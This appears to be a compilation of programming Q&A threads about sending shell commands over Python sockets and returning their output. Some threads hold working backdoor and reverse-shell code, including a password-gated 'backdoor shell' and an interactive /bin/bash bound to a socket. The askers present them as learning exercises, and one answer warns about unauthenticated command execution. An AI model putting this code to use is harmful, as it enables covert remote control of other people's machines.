Send output from a python server back to client - python

I now have a small Python server set up and working correctly; it is called from PHP like this:
<?php
$handle = fsockopen("udp://78.129.148.16",12345);
fwrite($handle,"vzctlrestart110");
fclose($handle);
?>
On the remote server, the following Python server is running and executing the commands:
#!/usr/bin/python
import os
import socket

print " Loading Bindings..."
settings = {}
line = 0
for each in open('/root/actions.txt', 'r'):
    line = line + 1
    each = each.rstrip()
    if each != "":
        if each[0] != '#':
            a = each.partition(':')
            if a[2]:
                settings[a[0]] = a[2]
            else:
                print " Err # line", line, ":", each
print " Starting Server...",
port = 12345
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("", port))
print "OK."
print " Listening on port:", port
while True:
    datagram = s.recv(1024)
    if not datagram:
        break
    print "Rx Cmd:", datagram
    if settings.has_key(datagram):
        print "Launch:", settings[datagram]
        os.system(settings[datagram]+" &")
s.close()
Is it possible to easily send the output of the command back? When the server is running a command, the output is shown in the SSH window, but I want that output sent back to the browser of the original client, perhaps by having the browser wait about 15 seconds and then check for any data received via the socket.
I know I am asking quite a lot. I am writing the PHP side, which I know well, but my Python knowledge is badly lacking.
Thanks,
Ashley

Yes, you can read the output of the command. For this I would recommend the Python subprocess module; then you can just send() the output back over the socket.
Naturally this has some implications: you would probably have to let your PHP script wait a while longer, since the command may take some time to finish.
# The pipe behaves like a file object in Python.
from subprocess import Popen, PIPE

process = Popen(cmd, shell=True, stdout=PIPE)
process_output = ""
while process.poll() is None:                # None means the process is still running
    process_output += process.stdout.read(256)
process_output += process.stdout.read()      # drain whatever is left after it exits
s.send(process_output)

# Better yet:
process = Popen(cmd, shell=True, stdout=PIPE)
stdout, stderr = process.communicate()       # reads stdout and waits for the process to end
s.send(stdout)
Integrated into your code:
# ... snip ...
import subprocess
while True:
    datagram, addr = s.recvfrom(1024)  # UDP: recvfrom also gives us the client's address
    if not datagram:
        break
    print "Rx Cmd:", datagram
    if settings.has_key(datagram):
        print "Launch:", settings[datagram]
        # No trailing "&" here: the process must stay in the foreground
        # so communicate() can collect its output.
        process = subprocess.Popen(settings[datagram], shell=True, stdout=subprocess.PIPE)
        stdout, stderr = process.communicate()
        s.sendto(stdout, addr)             # send the command's output back to the client
s.close()
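To check the round trip without involving a browser, a small UDP test client is handy. This is only a sketch (the address, command string, and 15-second timeout are taken from the question and are placeholders), using a socket timeout instead of a fixed wait:
# test_client.py -- minimal UDP test client (sketch)
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.settimeout(15)  # give the command up to 15 seconds to produce a reply
s.sendto("vzctlrestart110", ("78.129.148.16", 12345))
try:
    reply, addr = s.recvfrom(4096)  # the output the server sent back
    print reply
except socket.timeout:
    print "No reply within 15 seconds"
s.close()
On the PHP side the same idea should apply: after the fwrite(), set a read timeout with stream_set_timeout($handle, 15) and fread() the reply before fclose().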

Here's an example of how to get the output of a command:
>>> import commands
>>> s = commands.getoutput("ls *")
>>> s
'client.py'
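For reference, the commands module is Python 2 only (it was removed in Python 3); subprocess offers the same one-liner. A quick sketch:
import subprocess
s = subprocess.check_output("ls *", shell=True)  # returns the command's output (bytes on Python 3)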

Related

Python socket sending old data

I'm having a hard time in Python with subprocess and the socket module. What's happening is: I send a command to the client, but it doesn't send anything back until I send another command, at which point I get the output of the previous one. I've tried all the buffer sizes and none work.
SERVER:
while True:
    shell = input(">> ")
    conn.send(shell.encode())
    data = conn.recv(1600)
    print(data.decode())
CLIENT:
while True:
    data = sock.recv(1600)
    if not data:
        break
    data = data.decode()
    commd = subprocess.Popen(data, stdout=subprocess.PIPE, shell=True)
    out, err = commd.communicate()
    sock.send(out)
print("Exiting because no data")

Backdoor Shell doesn't allow me to change Directory

Below you can see a Python script which establishes a connection to my machine on port 1234. Using netcat I can listen on that port and then perform actions on my machine from the terminal (I know this is trivial, but it's just for practice).
The problem is that commands like "ls", "mkdir", "pwd", "rm" or even "ls /root/Desktop/" work, but "cd /root/Desktop" or "cd .." do not, which is really bad. Typing "cd .." does not return any error message, but it also does not change the directory; I cannot leave my Python directory.
Here is the script:
#! /usr/bin/python
import socket
import subprocess
host = "localhost"
port = 1234
passwd = "hacking"
def login():
    global s
    s.send("Login: ")
    pwd = s.recv(1024)
    if pwd.strip() != passwd:
        login()
    else:
        s.send("Connected #> ")
        shell()
def shell():
    while True:
        data = s.recv(1024)
        if data.strip() == ":kill":
            break
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        output = proc.stdout.read() + proc.stderr.read()
        s.send(output)
        s.send("#> ")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
login()
I got it from here.
Can anyone help me out? Any idea why I cannot leave the directory? Thanks in advance!
It actually works fine. Try this as a single command: cd /other/directory; ls. You'll see that the directory did in fact "change" for the duration of that command. Every new command gets a fresh shell (and so starts back in the same original directory). If you really want to change the "server context" between commands, then you need to do that in Python. Below is a dirty example added onto the code you provided:
#! /usr/bin/python
import socket
import subprocess
import os
host = "localhost"
port = 12345
passwd = "hacking"
def login():
    global s
    s.send("Login: ")
    pwd = s.recv(1024)
    if pwd.strip() != passwd:
        login()
    else:
        s.send("Connected #> ")
        shell()
def shell():
    while True:
        data = s.recv(1024).strip()
        if data == ":kill":
            break
        try:
            cmd, params = data.split(" ", 1)
            if cmd == ":chdir":
                os.chdir(params)
                print "chdir to %s" % (params)
                s.send("#> ")
                continue
        except:
            pass
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        output = proc.stdout.read() + proc.stderr.read()
        s.send(output)
        s.send("#> ")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
login()
Same idea as your ":kill" command: if the script sees ":chdir /new/directory", Python executes os.chdir() itself; otherwise the command is passed on to Popen. Since os.chdir() changes the working directory of the Python process, every subprocess spawned afterwards inherits the new directory, so the change persists between commands.
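For example, over the netcat session you would type ":chdir /root/Desktop" followed by "pwd", and pwd would now report /root/Desktop (this is just the expected behaviour of the code above, not output from an actual run).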

Python true interactive remote reverse shell

I'm trying to create a true interactive remote shell using Python. When I say true, I mean I don't want to just execute a single command and send the results; I have that working already. I also don't want to abstract single-command execution by having the server interpret directory changes or the like.
I am trying to have a client start an interactive /bin/bash and have the server send commands which are then executed by the same persistent shell. For instance, so if I run cd /foo/bar then pwd would return /foo/bar because I would be interacting with the same bash shell.
Here's some slimmed down example code that currently only will do single command execution...
# client.py
import socket
import subprocess
s = socket.socket()
s.connect(('localhost', 1337))
while True:
    cmd = s.recv(1024)
    # single command execution currently (not an interactive shell)
    results = subprocess.Popen(cmd, shell=True,
                               stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                               stdin=subprocess.PIPE)
    results = results.stdout.read() + results.stderr.read()
    s.sendall(results)
# server.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)
conn, _ = s.accept()
while True:
    cmd = raw_input('> ').rstrip()
    conn.send(cmd)
    results = conn.recv(4096)
    print results
I've tried many solutions, none of which have worked. The subprocess module has a communicate() method, but it kills the shell after a single command. I'd really like to accomplish this with the stdlib, but I've also looked at the pexpect module after reading this thread. However, I can't get that to work either, and it doesn't look like its primary use case is creating an interactive shell so much as catching specific command-line output to interact with. I can't even get single command execution working with pexpect...
import pexpect, sys
proc = pexpect.spawn('/bin/bash')
proc.logfile = sys.stdout
proc.expect('$ ')
proc.sendline('pwd\n')
If anyone can help it would be appreciated. I feel like there could be a way to multi-thread, spawn off a /bin/bash -i with subprocess, and then somehow write to its stdin and read from its stdout? Thanks in advance, and sorry for the length.
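As an aside on the pexpect snippet above: expect() takes a regular expression, so a literal '$' needs escaping, and sendline() already appends the newline. A sketch of single-command execution under those assumptions (default '$ ' prompt):
import pexpect, sys

proc = pexpect.spawn('/bin/bash')
proc.logfile = sys.stdout
proc.expect(r'\$ ')   # wait for the shell prompt
proc.sendline('pwd')  # sendline adds the newline itself
proc.expect(r'\$ ')   # wait for the next prompt...
print proc.before     # ...everything before it (including the echoed command) is the output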
Try this code:
# client.py
import socket
import subprocess
s = socket.socket()
s.connect(('localhost', 1337))
process = subprocess.Popen(['/bin/bash', '-i'],
                           stdout=s.makefile('wb'), stderr=subprocess.STDOUT,
                           stdin=s.makefile('rb'))
process.wait()
# server.py
import socket
import subprocess
import sys
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 1337))
s.listen(5)
conn, _ = s.accept()
fp = conn.makefile('wb')
proc1 = subprocess.Popen('cat', stdin=conn.makefile('rb'))  # prints the remote shell's output locally
while True:
    fp.write(sys.stdin.readline())  # forward each typed line to the remote bash
    fp.flush()                      # makefile() is buffered, so push it out now
proc1.wait()
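If a single persistent shell on the client is the goal, another option (a sketch, assuming a Unix client; names and port are illustrative) is to run bash inside a pseudo-terminal and shuttle bytes between it and the socket with select(), so cd and environment changes persist between commands:
# pty_client.py
import os
import pty
import select
import socket
import subprocess

s = socket.socket()
s.connect(('localhost', 1337))

master, slave = pty.openpty()  # bash sees a real terminal
proc = subprocess.Popen(['/bin/bash', '-i'],
                        stdin=slave, stdout=slave, stderr=slave,
                        close_fds=True)

while proc.poll() is None:
    readable, _, _ = select.select([s, master], [], [], 1.0)
    if s in readable:
        data = s.recv(1024)
        if not data:
            break
        os.write(master, data)            # feed the received command to bash
    if master in readable:
        s.sendall(os.read(master, 1024))  # relay bash's output back to the server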

Python connect socket to process

I have a (very) simple web server I wrote in C and I want to test it. I wrote it so that it takes data on stdin and sends its output on stdout. How would I connect the input/output of a socket (created with socket.accept()) to the input/output of a process created with subprocess.Popen?
Sounds simple, right? Here's the killer: I'm running Windows.
Can anyone help?
Here's what I've tried:
Passing the client object itself as stdin/out to subprocess.Popen. (It never hurts to try.)
Passing socket.makefile() results as stdin/out to subprocess.Popen.
Passing the socket's file number to os.fdopen().
Also, in case the question was unclear, here's a slimmed-down version of my code:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('', PORT))
sock.listen(5)
cli, addr = sock.accept()
p = subprocess.Popen([PROG])
#I want to connect 'p' to the 'cli' socket so whatever it sends on stdout
#goes to the client and whatever the client sends goes to its stdin.
#I've tried:
p = subprocess.Popen([PROG], stdin = cli.makefile("r"), stdout = cli.makefile("w"))
p = subprocess.Popen([PROG], stdin = cli, stdout = cli)
p = subprocess.Popen([PROG], stdin = os.fdopen(cli.fileno(), "r"), stdout = os.fdopen(cli.fileno(), "w"))
#but all of them give me either "Bad file descriptor" or "The handle is invalid".
I had the same issue and tried the same ways of binding the socket, also on Windows. The solution I came up with was to share the socket with the child process and bind it to stdin and stdout there. My solution is completely in Python, but I guess it is easily convertible.
import socket, subprocess
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('', PORT))
sock.listen(5)
cli, addr = sock.accept()
process = subprocess.Popen([PROG], stdin=subprocess.PIPE)
process.stdin.write(cli.share(process.pid))
process.stdin.flush()
# you can now use `cli` as client normally
And in the other process:
import sys, os, socket
sock = socket.fromshare(os.read(sys.stdin.fileno(), 372))
sys.stdin = sock.makefile("r")
sys.stdout = sock.makefile("w")
# stdin and stdout now write to `sock`
The 372 is the length of the blob returned by a measured socket.share() call. I don't know whether this is constant, but it worked for me. This is possible only on Windows, as the share() function is only available on that OS.
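To avoid hard-coding that size (which I would not rely on being constant), one option is a sketch like the following, under the same assumptions (Python 3.3+ on Windows): the parent closes the pipe after writing the blob, and the child simply reads until EOF before switching over to the socket.
# parent side (sketch)
blob = cli.share(process.pid)
process.stdin.write(blob)
process.stdin.close()  # EOF tells the child the blob is complete

# child side (sketch)
import sys, socket
blob = sys.stdin.buffer.read()  # read the whole blob, whatever its size
sock = socket.fromshare(blob)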

Python sending command over a socket

I'm having a bit of trouble. I want to create a simple program that connects to the server and executes a command using subprocess then returns the result to the client. It's simple but I can't get it to work. Right now this is what I have:
client:
import sys, socket, subprocess
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = sys.argv[1]
port = int(sys.argv[2])
socksize = 1024
conn.connect((host, port))
while True:
    shell = raw_input("$ ")
    conn.send(shell)
    data = conn.recv(socksize)
    #msglen = len(data)
    output = data
    iotype = subprocess.PIPE
    cmd = ['/bin/sh', '-c', shell]
    proc = subprocess.Popen(cmd, stdout=iotype).wait()
    stdout,stderr = proc.communicate()
    conn.send(stdout)
    print(output)
    if proc.returncode != 0:
        print("Error")
server:
import sys, socket, subprocess
host = ''
port = 50106
socksize = 1024
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
print("Server started on port: %s" % port)
s.listen(1)
print("Now listening...\n")
conn, addr = s.accept()
while True:
    print 'New connection from %s:%d' % (addr[0], addr[1])
    data = conn.recv(socksize)
    cmd = ['/bin/sh', '-c', data]
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE).wait()
    stdout,stderr = cmd.communicate()
    if not data:
        break
    elif data == 'killsrv':
        sys.exit()
Danger, Will Robinson!!!
Do you really want to send commands in clear text without authentication over the network? It is very, very dangerous.
Do it over SSH with paramiko.
Alright, I've heard this answer too many times. I don't want to use SSH; I'm just building this to learn more about sockets. I'm not going to actually use it if I want to send commands to a system. – AustinM
There is no way I could infer this noble quest from your question. :-)
The socket module is a thin layer over the POSIX library; working with plain sockets is tedious and hard to get right. As of today (2014), asynchronous I/O and concurrency are not among Python's strongest traits - 3.4 is starting to change that, but libraries will lag behind for a while. My advice is to spend your time learning some higher-level API like Twisted (twistedmatrix.com/trac). If you are really interested in the low-level stuff, dive into the project source.
Alright. Any idea how I could use Twisted for this type of thing? – AustinM
Look at twistedmatrix.com/documents/current/core/examples/#auto2
Well, I can understand your frustration, Austin; I was in the same boat. However, trial and error worked out in the end. Hopefully this is what you were looking for:
print "Command is:",command
op = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
if op:
output=str(op.stdout.read())
print "Output:",output
conn.sendall(output)
else:
error=str(op.stderr.read())
print "Error:",error
conn.sendall(error)
It's unclear why you are using subprocess.Popen() for the same command in both the client and the server. Here's an outline of what I would try to do (pseudocode):
client
    while True:
        read command from user
        send command to server
        wait for and then read response from server
        print response to user

server
    while True:
        wait for and then read command from client
        if command is "killsrv", exit
        execute command and capture output
        send output to client
The problem with your code is these lines (in both client and server):
proc = subprocess.Popen(cmd, stdout=iotype).wait()
stdout,stderr = proc.communicate()
You are calling wait on the Popen object, which means that the variable proc is getting an int (returned by wait) instead of a Popen object. You can just get rid of the wait -- since communicate waits for the process to end before returning, and you aren't checking the exit code anyway, you don't need to call it.
Then, in your client, I don't think you even need the subprocess calls, unless you're running some command that the server is sending back.
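Tying that outline together, here is a minimal sketch (host and port are placeholders; 'killsrv' stops both ends as in the question, and the server always sends something back so the client's recv() never blocks on empty output):
# sketch_client.py
import socket

conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn.connect(('localhost', 50106))
while True:
    shell = raw_input("$ ")
    conn.send(shell)
    if shell == 'killsrv':
        break
    print conn.recv(4096)

# sketch_server.py
import socket, subprocess

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 50106))
s.listen(1)
conn, addr = s.accept()
while True:
    data = conn.recv(1024)
    if not data or data == 'killsrv':
        break
    proc = subprocess.Popen(['/bin/sh', '-c', data],
                            stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    stdout, _ = proc.communicate()
    conn.send(stdout or "(no output)\n")  # always reply so the client's recv() returns
conn.close()
s.close()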
